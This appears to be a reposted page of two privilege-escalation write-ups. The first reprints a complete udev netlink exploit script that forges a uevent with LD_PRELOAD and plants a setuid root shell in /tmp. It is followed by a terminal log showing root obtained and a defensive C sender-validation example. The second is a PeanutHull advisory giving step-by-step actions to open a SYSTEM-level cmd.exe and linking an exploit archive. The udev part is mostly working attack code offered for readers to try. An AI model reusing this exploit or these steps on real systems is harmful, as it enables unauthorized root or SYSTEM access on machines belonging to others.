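udev Vulnerability Privilege Escalation (2 Selected Articles)
udev Vulnerability Privilege Escalation, Article 1
A privilege-escalation vulnerability in udev has been disclosed: anyone with ordinary user privileges can escalate to root. I tried it out, and escalation really is easy.
Save the code below as a file named test.sh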
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in
# tested on debian-etch,ubuntu,gentoo
# do a ‘cat /proc/net/netlink’
# and set the first arg to this
# script. to the pid of the netlink socket
# (the pid is udevd_pid C 1 most of the time)
# + sploit has to be UNIX formatted text
# + if it doesn’t work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, “add”);
sprintf(subsystem, “block”);
sprintf(sysfspath, “/dev/foo”);
sprintf(major, “8″);
sprintf(minor, “1″);
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, “%s@%s”, event, sysfspath) +1;
mp += sprintf(mp, “ACTION=%s”, event) +1;
mp += sprintf(mp, “DEVPATH=%s”, sysfspath) +1;
mp += sprintf(mp, “MAJOR=%s”, major) +1;
mp += sprintf(mp, “MINOR=%s”, minor) +1;
mp += sprintf(mp, “SUBSYSTEM=%s”, subsystem) +1;
mp += sprintf(mp, “LD_PRELOAD=/tmp/libno_ex.so.1.0″) +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
// execl(”/tmp/suid”, “suid”, (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include
#include
#include
#include
#include
void _init
{
setgid(0);
setuid(0);
unsetenv(”LD_PRELOAD”);
// execl(”/bin/sh”,”sh”,”-c”,”chown root:root /tmp/suid; chmod +s /tmp/suid”,NULL);
chown(”/tmp/suid”,0,0);
chmod(”/tmp/suid”,S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl(”/bin/sh”,”sh”,0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
# milw0rm.com [2009-04-20]
/tmp/suid
Then a few simple operations are enough to escalate from an ordinary user to root
[test@sbear-cn test]$ id
uid=500(test) gid=500(test) groups=500(test)
[test@sbear-cn test]$ ps -ef|grep udev
root 502 1 0 13:04 ? 00:00:00 /sbin/udevd -d // check the current PID of the udevd service
test 2635 2564 0 13:07 pts/0 00:00:00 grep udev
[test@sbear-cn test]$ sh test.sh 501 // udevd's PID minus 1, i.e. 502-1 = 501
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.2# id
uid=0(root) gid=0(root) groups=500(test) // root privileges obtained
sh-3.2# ls /root/
anaconda-ks.cfg
sh-3.2#
Upgrade your udev right away
www.milw0rm.com/exploits/8478
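The script above hands udevd a uevent as a unicast netlink datagram sent by an unprivileged process, so the receiver-side defence is to check where each datagram came from before acting on it. The C below is an added example, not code from the original post or from udev; the function and enum names are hypothetical, and it assumes the caller took the source address from recvmsg() and the sender uid from an SCM_CREDENTIALS control message on a socket with SO_PASSCRED enabled.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/netlink.h>

/* Hypothetical names: reasons a received uevent datagram is rejected. */
enum uevent_verdict {
    UEVENT_ACCEPT = 0, UEVENT_NOT_NETLINK, UEVENT_USERSPACE_PORT,
    UEVENT_UNICAST, UEVENT_NO_CREDENTIALS, UEVENT_NOT_ROOT
};

/* from:       source address recvmsg() stored in msg_name.
 * sender_uid: uid from the SCM_CREDENTIALS control message (assumes
 *             SO_PASSCRED is set), or NULL if none was attached. */
enum uevent_verdict uevent_check_sender(const struct sockaddr_nl *from,
                                        const uid_t *sender_uid)
{
    if (from == NULL || from->nl_family != AF_NETLINK)
        return UEVENT_NOT_NETLINK;
    if (from->nl_pid != 0)        /* the kernel sends from port id 0 */
        return UEVENT_USERSPACE_PORT;
    if (from->nl_groups == 0)     /* kernel uevents are multicast */
        return UEVENT_UNICAST;
    if (sender_uid == NULL)
        return UEVENT_NO_CREDENTIALS;
    if (*sender_uid != 0)
        return UEVENT_NOT_ROOT;
    return UEVENT_ACCEPT;
}

int main(void)
{
    /* Constructed samples, not captured traffic. */
    static const char *why[] = { "accept", "not netlink", "userspace port id",
        "unicast", "no credentials", "sender not root" };
    struct sockaddr_nl kernel = { .nl_family = AF_NETLINK, .nl_pid = 0, .nl_groups = 1 };
    struct sockaddr_nl local  = { .nl_family = AF_NETLINK, .nl_pid = 2635, .nl_groups = 0 };
    uid_t root = 0, user = 500;

    printf("kernel broadcast: %s\n", why[uevent_check_sender(&kernel, &root)]);
    printf("local unicast:    %s\n", why[uevent_check_sender(&local, &user)]);
    printf("missing creds:    %s\n", why[uevent_check_sender(&kernel, NULL)]);
    return 0;
}
```

Logging the returned reason for every rejected datagram also gives a detection signal: a rejected uevent on a host means some local process is trying to talk to the hotplug daemon directly.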
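udev Vulnerability Privilege Escalation, Article 2
PeanutHull<=3.0.1.0
Overview:
网域科技 (Oray) claims to be the world's largest DDNS (dynamic DNS) provider,
and PeanutHull (花生壳) is the client it provides.
For details, see www.oray.net
Details:
The vulnerability arises mainly because the PeanutHull client's system tray icon does not correctly drop SYSTEM privileges.
A local unprivileged user can execute arbitrary commands with SYSTEM privileges by accessing the system tray icon.
Exploit:
1. Double-click the PeanutHull icon in the taskbar to open the PeanutHull window
2. Click "Help" and open "Forum"
3. In the address bar of the IE window that pops up, enter C:
4. Switch to %WINDIR%System32
5. Click to open cmd.exe
6. The cmd.exe opened this way runs with SYSTEM privileges
Successful exploitation of this vulnerability yields SYSTEM privileges
Vendor response:
.07.13 Vendor notified by e-mail,
2005.07.14 Vendor replied that the issue would be fixed in the 3.0 final release
2005.07.20 PeanutHull 3.0 final release published
2005.07.20 This advisory published
Update:
While verifying this vulnerability, Secunia found that the latest version, 3.0.1.0, still has this flaw.
A local user can bring up the PeanutHull window by sending an SW_SHOW message, and from there escalate privileges.
2005.07.21 Test code published
Exploit:
secway.org/exploit/PeanutHull_Local.rar
or see the attachment
Solution:
None at present
Keep a close watch for patches from 网域科技 (Oray)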